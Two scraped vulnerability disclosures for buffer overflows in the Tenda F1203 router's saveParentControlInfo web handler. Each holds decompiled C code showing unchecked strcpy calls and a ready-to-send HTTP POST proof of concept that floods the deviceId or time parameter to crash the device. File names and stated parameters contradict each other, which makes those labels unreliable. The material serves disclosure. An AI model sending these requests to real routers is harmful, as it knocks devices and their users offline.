aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaa

CVE-2022-46550: CVE-vulns/saveParentControlInfo_urls.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the deviceId parameter at /goform/saveParentControlInfo.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/saveParentControlInfo request.

This vulnerability lies in the /goform/saveParentControlInfo page，The details are shown below:

    int __fastcall saveParentControlInfo(int a1)
    {
      int v2; // $v0
      int v3; // $v0
      void *dest; // [sp+30h] [+30h] BYREF
      void *ptr; // [sp+34h] [+34h]
      int v6; // [sp+38h] [+38h]
      int v7; // [sp+3Ch] [+3Ch]
      int i; // [sp+40h] [+40h]
      int v9; // [sp+44h] [+44h]
      int v10; // [sp+48h] [+48h]
      char *nptr; // [sp+4Ch] [+4Ch]
      char *v12; // [sp+50h] [+50h]
      char *v13; // [sp+54h] [+54h]
      char *urls_value; // [sp+58h] [+58h]
      char *v15; // [sp+5Ch] [+5Ch]
      char *time_value; // [sp+60h] [+60h]
      char *v17; // [sp+68h] [+68h]
      char *deviceId_value; // [sp+6Ch] [+6Ch]
      char v19[64]; // [sp+70h] [+70h] BYREF
      char v20[512]; // [sp+B0h] [+B0h] BYREF
      int v21; // [sp+2B0h] [+2B0h] BYREF
      __int16 v22; // [sp+2B4h] [+2B4h] BYREF
      unsigned __int8 v23; // [sp+2B6h] [+2B6h] BYREF
      char v24[120]; // [sp+2B8h] [+2B8h] BYREF
      char v25[128]; // [sp+330h] [+330h] BYREF
      int v26; // [sp+3B0h] [+3B0h] BYREF
      int v27[5]; // [sp+3B4h] [+3B4h] BYREF
      int v28[8]; // [sp+3C8h] [+3C8h] BYREF
      int v29[8]; // [sp+3E8h] [+3E8h] BYREF
    
      memset(v19, 0, sizeof(v19));
      memset(v20, 0, sizeof(v20));
      v21 = 0;
      v22 = 0;
      v23 = 0;
      deviceId_value = (char *)websGetVar(a1, "deviceId", &unk_4CE8D8);
      v17 = (char *)websGetVar(a1, "enable", &unk_4CE8D8);
      time_value = (char *)websGetVar(a1, "time", &unk_4CE8D8);
      v15 = (char *)websGetVar(a1, "url_enable", &unk_4CE8D8);
      urls_value = (char *)websGetVar(a1, "urls", &unk_4CE8D8);
      v13 = (char *)websGetVar(a1, "day", &unk_4CE8D8);
      v12 = (char *)websGetVar(a1, "block", &unk_4CE8D8);
      nptr = (char *)websGetVar(a1, "connectType", &unk_4CE8D8);
      if ( atoi(nptr) == 1 && atoi(v12) == 1 )
        wl_l2_filter_add(deviceId_value);
      if ( *time_value )
      {
        v28[0] = 0;
        v28[1] = 0;
        v28[2] = 0;
        v28[3] = 0;
        v28[4] = 0;
        v28[5] = 0;
        v28[6] = 0;
        v28[7] = 0;
        v29[0] = 0;
        v29[1] = 0;
        v29[2] = 0;
        v29[3] = 0;
        v29[4] = 0;
        v29[5] = 0;
        v29[6] = 0;
        v29[7] = 0;
        sscanf(time_value, "%[^-]-%s", v28, v29);
        if ( !strcmp((const char *)v28, (const char *)v29) )
        {
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 1);
          return websDone(a1, 200);
        }
      }
      v10 = 0;
      v9 = 0;
      i = 0;
      memset(v24, 0, sizeof(v24));
      memset(v25, 0, sizeof(v25));
      v7 = 0;
      v26 = 0;
      v6 = 0;
      ptr = malloc(0x254u);
      memset(ptr, 0, 0x254u);
      strcpy((char *)ptr + 2, deviceId_value);
      dest = malloc(0x254u);
      memset(dest, 0, 0x254u);
      *(_WORD *)dest = atoi(v17) != 0;
      strcpy((char *)dest + 2, deviceId_value);
      strcpy((char *)dest + 34, time_value);
      sscanf(
        v13,
        "%d,%d,%d,%d,%d,%d,%d",
        &v21,
        (char *)&v21 + 1,
        (char *)&v21 + 2,
        (char *)&v21 + 3,
        &v22,
        (char *)&v22 + 1,
        &v23);
      if ( !(_BYTE)v21
        && __PAIR16__(BYTE1(v21), 0) == BYTE2(v21)
        && __PAIR16__(HIBYTE(v21), 0) == (unsigned __int8)v22
        && __PAIR16__(HIBYTE(v22), 0) == v23
        && !*v12 )
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = 1;
      }
      else
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = *((_BYTE *)&v21 + i) != 0;
      }
      v2 = atoi(time_value);
      *((_DWORD *)dest + 19) = v2;
      strcpy((char *)dest + 80, urls_value);
      v3 = atoi(v15);
      *((_BYTE *)dest + 592) = v3 != 0;
      v10 = getparentcontrolinfo(0, &v26, ptr);
      if ( v10 <= 0 )
      {
        if ( !atoi(v17) && atoi(v12) != 1 )
        {
    LABEL_28:
          free(ptr);
          free(dest);
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 0);
          return websDone(a1, 200);
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
            for ( i = 0; i < 7; ++i )
              *((_BYTE *)dest + i + 66) = 1;
            strcpy((char *)dest + 34, "00:00-24:00");
          }
        }
        v9 = bm_get_id_list("parent.control.id", v24, 30);
        if ( v9 )
        {
          if ( v9 >= 30 )
          {
            free(ptr);
            free(dest);
            websWrite(
              a1,
              "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
            websWrite(a1, "{\"errCode\":%d}", 1);
            return websDone(a1, 200);
          }
          for ( i = 0; i != 30; ++i )
          {
            if ( !*(&dest + i + 162) )
            {
              v26 = i + 1;
              break;
            }
          }
          GetValue("parent.control.id", v20);
          sprintf(v25, "%s,%d", v20, v26);
          SetValue("parent.control.id", v25);
          setparentcontrolinfo(v10, v26, dest);
        }
        else
        {
          SetValue("parent.control.id", "1");
          v26 = 1;
          setparentcontrolinfo(v10, 1, dest);
        }
      }
      else
      {
        if ( atoi(v17) )
        {
          *((_DWORD *)dest + 19) = *((_DWORD *)ptr + 19);
        }
        else
        {
          memcpy(dest, ptr, 0x254u);
          *(_BYTE *)dest = 0;
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          memcpy(dest, ptr, 0x254u);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
          }
          else
          {
            *((_BYTE *)dest + 1) = 0;
          }
        }
        if ( !memcmp(ptr, dest, 0x254u) )
          goto LABEL_28;
        setparentcontrolinfo(v10, v26, dest);
      }
      free(ptr);
      free(dest);
      v27[0] = 0;
      v27[1] = 0;
      v27[2] = 0;
      v27[3] = 0;
      v27[4] = 0;
      sprintf((char *)v27, "op=%d", 5);
      send_msg_to_netctrl(14, v27);
      send_msg_to_netctrl(41, v27);
      CommitCfm();
      websWrite(
        a1,
        "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
      websWrite(a1, "{\"errCode\":%d}", 0);
      return websDone(a1, 200);
    }
    

This POC can result in a Dos.

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4106
    
    deviceId=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaa

CVE-2022-46549: CVE-vulns/saveParentControlInfo_deviceId.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the time parameter at /goform/saveParentControlInfo.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/saveParentControlInfo request.

This vulnerability lies in the /goform/saveParentControlInfo page，The details are shown below:

    int __fastcall saveParentControlInfo(int a1)
    {
      int v2; // $v0
      int v3; // $v0
      void *dest; // [sp+30h] [+30h] BYREF
      void *ptr; // [sp+34h] [+34h]
      int v6; // [sp+38h] [+38h]
      int v7; // [sp+3Ch] [+3Ch]
      int i; // [sp+40h] [+40h]
      int v9; // [sp+44h] [+44h]
      int v10; // [sp+48h] [+48h]
      char *nptr; // [sp+4Ch] [+4Ch]
      char *v12; // [sp+50h] [+50h]
      char *v13; // [sp+54h] [+54h]
      char *urls_value; // [sp+58h] [+58h]
      char *v15; // [sp+5Ch] [+5Ch]
      char *time_value; // [sp+60h] [+60h]
      char *v17; // [sp+68h] [+68h]
      char *deviceId_value; // [sp+6Ch] [+6Ch]
      char v19[64]; // [sp+70h] [+70h] BYREF
      char v20[512]; // [sp+B0h] [+B0h] BYREF
      int v21; // [sp+2B0h] [+2B0h] BYREF
      __int16 v22; // [sp+2B4h] [+2B4h] BYREF
      unsigned __int8 v23; // [sp+2B6h] [+2B6h] BYREF
      char v24[120]; // [sp+2B8h] [+2B8h] BYREF
      char v25[128]; // [sp+330h] [+330h] BYREF
      int v26; // [sp+3B0h] [+3B0h] BYREF
      int v27[5]; // [sp+3B4h] [+3B4h] BYREF
      int v28[8]; // [sp+3C8h] [+3C8h] BYREF
      int v29[8]; // [sp+3E8h] [+3E8h] BYREF
    
      memset(v19, 0, sizeof(v19));
      memset(v20, 0, sizeof(v20));
      v21 = 0;
      v22 = 0;
      v23 = 0;
      deviceId_value = (char *)websGetVar(a1, "deviceId", &unk_4CE8D8);
      v17 = (char *)websGetVar(a1, "enable", &unk_4CE8D8);
      time_value = (char *)websGetVar(a1, "time", &unk_4CE8D8);
      v15 = (char *)websGetVar(a1, "url_enable", &unk_4CE8D8);
      urls_value = (char *)websGetVar(a1, "urls", &unk_4CE8D8);
      v13 = (char *)websGetVar(a1, "day", &unk_4CE8D8);
      v12 = (char *)websGetVar(a1, "block", &unk_4CE8D8);
      nptr = (char *)websGetVar(a1, "connectType", &unk_4CE8D8);
      if ( atoi(nptr) == 1 && atoi(v12) == 1 )
        wl_l2_filter_add(deviceId_value);
      if ( *time_value )
      {
        v28[0] = 0;
        v28[1] = 0;
        v28[2] = 0;
        v28[3] = 0;
        v28[4] = 0;
        v28[5] = 0;
        v28[6] = 0;
        v28[7] = 0;
        v29[0] = 0;
        v29[1] = 0;
        v29[2] = 0;
        v29[3] = 0;
        v29[4] = 0;
        v29[5] = 0;
        v29[6] = 0;
        v29[7] = 0;
        sscanf(time_value, "%[^-]-%s", v28, v29);
        if ( !strcmp((const char *)v28, (const char *)v29) )
        {
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 1);
          return websDone(a1, 200);
        }
      }
      v10 = 0;
      v9 = 0;
      i = 0;
      memset(v24, 0, sizeof(v24));
      memset(v25, 0, sizeof(v25));
      v7 = 0;
      v26 = 0;
      v6 = 0;
      ptr = malloc(0x254u);
      memset(ptr, 0, 0x254u);
      strcpy((char *)ptr + 2, deviceId_value);
      dest = malloc(0x254u);
      memset(dest, 0, 0x254u);
      *(_WORD *)dest = atoi(v17) != 0;
      strcpy((char *)dest + 2, deviceId_value);
      strcpy((char *)dest + 34, time_value);
      sscanf(
        v13,
        "%d,%d,%d,%d,%d,%d,%d",
        &v21,
        (char *)&v21 + 1,
        (char *)&v21 + 2,
        (char *)&v21 + 3,
        &v22,
        (char *)&v22 + 1,
        &v23);
      if ( !(_BYTE)v21
        && __PAIR16__(BYTE1(v21), 0) == BYTE2(v21)
        && __PAIR16__(HIBYTE(v21), 0) == (unsigned __int8)v22
        && __PAIR16__(HIBYTE(v22), 0) == v23
        && !*v12 )
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = 1;
      }
      else
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = *((_BYTE *)&v21 + i) != 0;
      }
      v2 = atoi(time_value);
      *((_DWORD *)dest + 19) = v2;
      strcpy((char *)dest + 80, urls_value);
      v3 = atoi(v15);
      *((_BYTE *)dest + 592) = v3 != 0;
      v10 = getparentcontrolinfo(0, &v26, ptr);
      if ( v10 <= 0 )
      {
        if ( !atoi(v17) && atoi(v12) != 1 )
        {
    LABEL_28:
          free(ptr);
          free(dest);
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 0);
          return websDone(a1, 200);
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
            for ( i = 0; i < 7; ++i )
              *((_BYTE *)dest + i + 66) = 1;
            strcpy((char *)dest + 34, "00:00-24:00");
          }
        }
        v9 = bm_get_id_list("parent.control.id", v24, 30);
        if ( v9 )
        {
          if ( v9 >= 30 )
          {
            free(ptr);
            free(dest);
            websWrite(
              a1,
              "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
            websWrite(a1, "{\"errCode\":%d}", 1);
            return websDone(a1, 200);
          }
          for ( i = 0; i != 30; ++i )
          {
            if ( !*(&dest + i + 162) )
            {
              v26 = i + 1;
              break;
            }
          }
          GetValue("parent.control.id", v20);
          sprintf(v25, "%s,%d", v20, v26);
          SetValue("parent.control.id", v25);
          setparentcontrolinfo(v10, v26, dest);
        }
        else
        {
          SetValue("parent.control.id", "1");
          v26 = 1;
          setparentcontrolinfo(v10, 1, dest);
        }
      }
      else
      {
        if ( atoi(v17) )
        {
          *((_DWORD *)dest + 19) = *((_DWORD *)ptr + 19);
        }
        else
        {
          memcpy(dest, ptr, 0x254u);
          *(_BYTE *)dest = 0;
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          memcpy(dest, ptr, 0x254u);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
          }
          else
          {
            *((_BYTE *)dest + 1) = 0;
          }
        }
        if ( !memcmp(ptr, dest, 0x254u) )
          goto LABEL_28;
        setparentcontrolinfo(v10, v26, dest);
      }
      free(ptr);
      free(dest);
      v27[0] = 0;
      v27[1] = 0;
      v27[2] = 0;
      v27[3] = 0;
      v27[4] = 0;
      sprintf((char *)v27, "op=%d", 5);
      send_msg_to_netctrl(14, v27);
      send_msg_to_netctrl(41, v27);
      CommitCfm();
      websWrite(
        a1,
        "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
      websWrite(a1, "{\"errCode\":%d}", 0);
      return websDone(a1, 200);
    }
    

This POC can result in a Dos.

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4117
    
    time=00:00-24:0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa